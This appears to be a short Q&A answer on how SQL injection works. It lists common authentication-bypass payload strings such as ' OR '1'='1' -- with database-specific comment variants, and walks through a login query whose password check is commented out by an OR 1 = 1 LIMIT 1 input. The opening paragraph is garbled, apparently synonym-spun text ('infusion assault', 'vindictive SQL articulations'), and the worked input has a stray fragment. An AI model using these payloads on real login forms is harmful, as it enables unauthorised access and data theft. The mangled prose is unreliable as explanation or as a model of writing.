Question

Describe how an SQL command injection attack might work.

Answer 1

SQL Injection (SQLi) is a sort of an infusion assault that makes it conceivable to execute vindictive SQL articulations. These announcements control a database server behind a web application. Assailants can utilize SQL Injection vulnerabilities to sidestep application safety efforts. They can circumvent validation and approval of a page or web application and recover the substance of the whole SQL database. They can likewise utilize SQL Injection to include, change, and erase records in the database.

below are some examples which is used in the injection.

password' OR 1=1
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16

SELECT * FROM users WHERE email = '[email protected]' AND password = md5('1234');

The above code can be exploited by commenting out the password part and appending a condition that will always be true. Let’s suppose an attacker provides the following input in the email address field.

[email protected]' OR 1 = 1 LIMIT 1 -- ' ]

xxx for the password.

The generated dynamic statement will be as follows.

SELECT * FROM users WHERE email = '[email protected]' OR 1 = 1 LIMIT 1 -- ' ] AND password = md5('1234');

HERE,

[email protected] ends with a single quote which completes the string quote
OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned results to only one record.
-- ' AND … is a SQL comment that eliminates the password part.